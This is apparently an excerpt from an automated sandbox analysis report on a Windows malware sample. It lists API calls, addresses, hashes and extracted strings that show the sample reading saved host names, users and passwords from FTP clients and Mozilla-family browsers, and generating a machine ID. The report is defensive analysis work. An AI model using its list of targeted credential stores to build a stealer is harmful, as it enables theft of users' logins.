                                        • Opcode ID: 17ca9c81d94dd63a93fedb0317eefa9fec71737b1ad01ce7cd9fdb13dad609b7
                                        • Instruction ID: 5ed8e385ddb8741f3a2d5b095824f2ba492a62f7d3c15441c2dce2e623aa42ca
                                        • Opcode Fuzzy Hash: 17ca9c81d94dd63a93fedb0317eefa9fec71737b1ad01ce7cd9fdb13dad609b7
                                        • Instruction Fuzzy Hash: F45112B1A80219B9DF01BBE1CC03FAD3A669F90788F25817B7A14B40F1DB7D49919A5C
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404BB1
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404BE5
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404D0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: HostName$Password$User
                                        • API String ID: 1332880857-1253078594
                                        • Opcode ID: f572c169c01acb4e0d858261cd28209452183dab80e656892684e8374239ece7
                                        • Instruction ID: 96250fc842fedf21946fbc0c7b81ba549857ecd1430347191a29d189e377c1b9
                                        • Opcode Fuzzy Hash: f572c169c01acb4e0d858261cd28209452183dab80e656892684e8374239ece7
                                        • Instruction Fuzzy Hash: 1D31E771840119BADF22AB51CC06BDD7AB9BF40308F10C0BAB558751B1DB795AD2AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004090E8
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040911C
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040920E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                        • API String ID: 1332880857-3184955129
                                        • Opcode ID: 1f7f33fed0ef77db53f0d9806de287de843012427135b813592c62b40aaf3ede
                                        • Instruction ID: 73f76612c1b73da15edfcd094bed8864fe9b844aff7cab852813e99c301d0066
                                        • Opcode Fuzzy Hash: 1f7f33fed0ef77db53f0d9806de287de843012427135b813592c62b40aaf3ede
                                        • Instruction Fuzzy Hash: 9731E771900109FADF216F61CC42BDD7ABABF40308F14C4BAB554750E2DE795EA1AF98
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A0EC
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A131
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
                                          • Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
                                          • Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                        • API String ID: 3007406096-624000163
                                        • Opcode ID: 94623372bfb2d21f1685055c8992226c84d47227d5508bd715d737690d63e15f
                                        • Instruction ID: d40e6bff5471d4cd777bcf0cde274d7fea09c41e329ed5a365a323144afc3d9e
                                        • Opcode Fuzzy Hash: 94623372bfb2d21f1685055c8992226c84d47227d5508bd715d737690d63e15f
                                        • Instruction Fuzzy Hash: B50112716C0609FADB10FB51CC47FDD3A699F90788F10412B7A04B50E2DAB959D0969D
                                        APIs
                                        • StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
                                          • Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
                                          • Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                        • String ID: PathToExe
                                        • API String ID: 3012581338-1982016430
                                        • Opcode ID: 490e87ac5c84d52e22241c128ad48efc0cfca60f9716826e83606afa0a4aab13
                                        • Instruction ID: d437394a875704394b0217962e71823c610bd95a03ecef1c515e51d418b271c9
                                        • Opcode Fuzzy Hash: 490e87ac5c84d52e22241c128ad48efc0cfca60f9716826e83606afa0a4aab13
                                        • Instruction Fuzzy Hash: 3731D67194420ABADF016FE1CC02FEF7A75AF14348F144076B610B41F2DB799960AB59
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040287A
                                        • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028FC
                                        • GlobalLock.KERNEL32(?), ref: 00402908
                                        • GlobalUnlock.KERNEL32(?), ref: 0040292A
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(?), ref: 00401EA9
                                          • Part of subcall function 00401E88: lstrlenA.KERNEL32(00000000,?), ref: 00401EB3
                                          • Part of subcall function 00401E88: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401EC7
                                          • Part of subcall function 00401E88: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401ED0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                        • String ID: Software\WinRAR
                                        • API String ID: 2536169780-224198155
                                        • Opcode ID: c228d8f29b4bbf335a18e163b28590f6e2fc8199ca3417e222d331081b7ec13e
                                        • Instruction ID: 7e571d5fb8ff8b76c5d46e44ce64646fdbe1b02ef4e227fcc485b7895c5a3033
                                        • Opcode Fuzzy Hash: c228d8f29b4bbf335a18e163b28590f6e2fc8199ca3417e222d331081b7ec13e
                                        • Instruction Fuzzy Hash: AC211DB6A0010DBACF01ABE1CD4ADEEBB7DAF14348F104476B610B10F1D6BD9A949B18
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404AA3
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 00404ADC
                                        • StrStrIA.SHLWAPI(?,Line), ref: 00404B0D
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID: Line
                                        • API String ID: 4012628704-1898322888
                                        • Opcode ID: 514fa578dfee4ba82bfb5fa4791be43d1ddf10ba2a0a50f6d9ab5609a06e0caa
                                        • Instruction ID: b0ad2cfb46005793c0c0abe5dd3ab5746b162f93cc5fb6bfc144e89947cd2d14
                                        • Opcode Fuzzy Hash: 514fa578dfee4ba82bfb5fa4791be43d1ddf10ba2a0a50f6d9ab5609a06e0caa
                                        • Instruction Fuzzy Hash: DB21F9B1840118FADF21AB90CC02BED77B9AF40308F0480B7A655750A1DB79AB95DF99
                                        APIs
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401A76
                                        • GlobalLock.KERNEL32(?), ref: 00401A91
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • GlobalUnlock.KERNEL32(?), ref: 00401AB9
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401AC1
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                        • String ID: CRYPTED0YUI1.0
                                        • API String ID: 4083238039-1217275205
                                        • Opcode ID: bd3919a52a1e2bdfbf7140e69235c6026d4d8811ef6e730f5db43e14d8b7a2e6
                                        • Instruction ID: c0153cecf658e2022cfbe4c23f1f27468bc0d5f7d6a7bb3d229d95f63e470793
                                        • Opcode Fuzzy Hash: bd3919a52a1e2bdfbf7140e69235c6026d4d8811ef6e730f5db43e14d8b7a2e6
                                        • Instruction Fuzzy Hash: 1011C97190010DBBDF026FE1CC42CDD7F7AAF10348F00807AB915B50B2D77A9AA1AB58
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E651
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E68A
                                        • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E6D1
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E6FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID: .wjf
                                        • API String ID: 4012628704-198459012
                                        • Opcode ID: 845ae2bd0b9a97d66b0dd1607ffb49ea1f95a1c64f969f1219966797e9f728f6
                                        • Instruction ID: 1c63f224acb28aac00906c0b99f7b4c2dea3cefb9db1523bc3fa0221065386cd
                                        • Opcode Fuzzy Hash: 845ae2bd0b9a97d66b0dd1607ffb49ea1f95a1c64f969f1219966797e9f728f6
                                        • Instruction Fuzzy Hash: 50112E7281000CFACF119B91CC02BDDBBB9BF10304F4488B6B515B11A1DB799AA59F98
                                        APIs
                                          • Part of subcall function 00402844: GetTempPathA.KERNEL32(00000104,?), ref: 0040287A
                                          • Part of subcall function 00402844: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028FC
                                          • Part of subcall function 00402844: GlobalLock.KERNEL32(?), ref: 00402908
                                          • Part of subcall function 00402844: GlobalUnlock.KERNEL32(?), ref: 0040292A
                                        • CoCreateGuid.OLE32(?,00000000), ref: 0040480F
                                        • wsprintfA.USER32 ref: 00404856
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404862
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                        • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                        • API String ID: 1852535927-1100116640
                                        • Opcode ID: b7b028101add646b24eb2c313dd6bafe52ef84dede1830d4a27c51306838e557
                                        • Instruction ID: df54e70fc0e8366707f7b91954caf3fefd6b263816b42dbb75c049cb81f3a1b9
                                        • Opcode Fuzzy Hash: b7b028101add646b24eb2c313dd6bafe52ef84dede1830d4a27c51306838e557
                                        • Instruction Fuzzy Hash: 88110CA68141987DDB61E2F68C15EFFBBFC5909205B1400A7B6A0F2082E67DD740DB38
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A036
                                          • Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                          • Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                          • Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                          • Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A07B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
                                        • API String ID: 3062143572-2631691096
                                        • Opcode ID: b051bf477c61d08f413ac179833e1cd328482dc73794cfc8887449b3799d09ca
                                        • Instruction ID: 2ad02519c29ffec47796f1de9b44df3f2de04b3b295ee020e8f54bd766fd6585
                                        • Opcode Fuzzy Hash: b051bf477c61d08f413ac179833e1cd328482dc73794cfc8887449b3799d09ca
                                        • Instruction Fuzzy Hash: B2F01D70680609FACB10EB51CC53FCD7A699F90788F204166B608B50E2DBF95AD0DB9C
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A173
                                          • Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                          • Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                          • Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                          • Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A1B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                        • API String ID: 3062143572-164276155
                                        • Opcode ID: babff25430e4f365ea0e2014d95ba9808793be354daf6e31b05222e32a6df86d
                                        • Instruction ID: 9fe71bc26396215c61a75a3107301519d848e6ab75275e33a641b6866ab1e780
                                        • Opcode Fuzzy Hash: babff25430e4f365ea0e2014d95ba9808793be354daf6e31b05222e32a6df86d
                                        • Instruction Fuzzy Hash: 9DF0F970A81609FACB10EB51CC46FCD7A699F90788F204066B604B50E2DBF95AD0DA9C
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A1FA
                                          • Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                          • Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                          • Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                          • Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A23F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                        • API String ID: 3062143572-1276807325
                                        • Opcode ID: ee61de0c382090adc2765c5d1035e2767923c845b80061751cb4b5679c4cf616
                                        • Instruction ID: 3c1e3bb89bc4743297c5096db4720c44fb7e1e70c6b984c046b142b0982cf536
                                        • Opcode Fuzzy Hash: ee61de0c382090adc2765c5d1035e2767923c845b80061751cb4b5679c4cf616
                                        • Instruction Fuzzy Hash: ACF01D70694608FACB10FB51DC43FCD7A699B90748F204066B644B50E3DBF95AD0DB9C
                                        APIs
                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040A281
                                          • Part of subcall function 00409F00: StrStrIA.SHLWAPI(?,?), ref: 00409F0C
                                          • Part of subcall function 00409F00: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409F83
                                          • Part of subcall function 00409F00: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FAF
                                          • Part of subcall function 00409F00: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409FF7
                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A2C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CurrentDirectory$CloseEnumOpen
                                        • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                        • API String ID: 3062143572-2716603926
                                        • Opcode ID: 01877a481b4b215b5d64b5c6ac5329170623aa1f9e40f533c9b037501c5977e4
                                        • Instruction ID: 8df44532bde05e65d7ba4226275c4343473a842cd46792264138c0cb17815f64
                                        • Opcode Fuzzy Hash: 01877a481b4b215b5d64b5c6ac5329170623aa1f9e40f533c9b037501c5977e4
                                        • Instruction Fuzzy Hash: 50F01D70680609FACB11EF51CC47FCD7B699B94748F204066B604B50E2EBF96AD1DB9C
                                        APIs
                                        • StrStrIA.SHLWAPI(00542E18,3D-FTP), ref: 0040CD3E
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                        • API String ID: 1884169789-4074339522
                                        • Opcode ID: ccb832f8d6294ba54f81485a60962b0762f8e89fe3feef3c0128095ca51d499c
                                        • Instruction ID: 11f2e4e829d6b45beb417fccaf5cead2cde491bac4b3eda310811c49aac8815d
                                        • Opcode Fuzzy Hash: ccb832f8d6294ba54f81485a60962b0762f8e89fe3feef3c0128095ca51d499c
                                        • Instruction Fuzzy Hash: 0111A3B1980201B9EB30BB71CC03FAF3D599F60744F15463BB918B11E2DA7CDA5192AC
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 0040B1AF
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B1E3
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B2CB
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF6C
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF7F
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AF92
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFA5
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFB8
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFCB
                                          • Part of subcall function 0040AF00: wsprintfA.USER32 ref: 0040AFDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$CloseEnumOpen
                                        • String ID: SiteServers
                                        • API String ID: 1693054222-2402683488
                                        • Opcode ID: be8a98160c99f38d5d3a29f49b07001e0fa052176103d7a4bfd3339d7d78f9f1
                                        • Instruction ID: ff345f41e9badcc5242353447f49ba9d611c8c99c40e21d3bd177640c75f1bb7
                                        • Opcode Fuzzy Hash: be8a98160c99f38d5d3a29f49b07001e0fa052176103d7a4bfd3339d7d78f9f1
                                        • Instruction Fuzzy Hash: D5310A7180011CEADF21AB90CC06BDEB6B9FF14308F04C0FAA558750A0CB795B96AFD9
                                        APIs
